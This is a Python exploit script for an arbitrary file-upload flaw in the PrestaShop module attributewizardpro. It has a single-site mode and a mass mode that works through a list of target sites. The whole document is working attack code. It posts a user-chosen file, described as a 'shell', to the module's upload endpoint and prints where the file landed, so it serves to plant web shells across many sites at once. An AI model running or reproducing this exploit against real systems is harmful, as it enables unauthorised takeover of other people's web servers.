#!/usr/bin/python
####################################################################################
#Author : PentesterDesk
#Date : 29-June-2016
#Software: Prestashop CMS
#vuln Mod: attributewizardpro
####################################################################################
import
sys, os
import
requests
def
main():
os.system(
'cls'
and
'color -a'
if
os.name
=
=
"nt"
else
'clear'
)
banner
=
'''
+======================================================+
| Prestashop | FileUpload Exp | PentesterDesk |
| Coded by : PentesterDesk Team |
| Contact : pentesterdesk@gmail.com |
+======================================================+
'''
print
banner
#/modules/attributewizardpro/
os.system(
'cls'
and
'color -a'
if
os.name
=
=
"nt"
else
'clear'
)
print
banner
print
"\n <============[[Attributewizardpro Exploit]]============>\n"
print
"[1] Single Site "
print
"[2] Mass Upload"
ch
=
raw_input
(
"\n[>] "
)
if
ch
=
=
'1'
:
os.system(
'cls'
and
'color -a'
if
os.name
=
=
"nt"
else
'clear'
)
print
banner
print
"\n <============[[Attributewizardpro Exploit]]============>\n"
url
=
raw_input
(
"[+] Enter Url : "
)
filname
=
raw_input
(
"[+] Enter File : "
)
if
filname
=
=
'
' or url == '
':
print
"\n[!] Url or File is not entered\n"
raw_input
(
"[+] Press Enter [>] "
)
main()
url
=
url
+
"/modules/attributewizardpro/file_upload.php"
#main
files
=
{
'userfile'
:(filname,
open
(filname,
'rb'
),
'multipart/form-data'
)}
req
=
requests.post(url,files
=
files)
final
=
[]
final
=
(req.text).split(
"||||"
)
if
req.status_code
=
=
200
and
filname
in
req.text:
url
=
url.replace(
'/file_upload.php'
,
'/file_uploads/'
+
final[
0
])
print
(
"[+] %s [ok]"
%
(url))
else
:
print
"\n[+] %s [no]\n"
%
url
raw_input
(
"\n[+] Press Enter [>] "
)
#mass
if
ch
=
=
'2'
:
os.system(
'cls'
and
'color -a'
if
os.name
=
=
"nt"
else
'clear'
)
print
banner
print
"\n <============[[Attributewizardpro Exploit]]============>\n"
filee
=
raw_input
(
"[+] Enter List Name : "
)
filname
=
raw_input
(
"[+] Enter Shell Name : "
)
if
filname
=
=
'
' or filee == '
':
print
"\n[!] Url or File is not entered\n"
raw_input
(
"[+] Press Enter [>] "
)
main()
ob
=
open
(filee,
'r'
)
lists
=
ob.readlines()
list1
=
[]
i
=
0
for
i
in
range
(
len
(lists)):
list1.append(lists[i].strip(
'\n'
))
count
=
0
for
site
in
(list1):
count
=
count
+
1
url
=
site
+
"/modules/attributewizardpro/file_upload.php"
files
=
{
'userfile'
:(filname,
open
(filname,
'rb'
),
'multipart/form-data'
)}
req
=
requests.post(url,files
=
files)
final
=
[]
final
=
(req.text).split(
"||||"
)
if
req.status_code
=
=
200
and
filname
in
req.text:
url
=
url.replace(
'/file_upload.php'
,
'/file_uploads/'
+
final[
0
])
print
(
"[%d] %s [ ok ]"
%
(count,url))
else
:
print
(
"[%d] %s [ No ]"
%
(count,url))
if
__name__
=
=
"__main__"
:
main()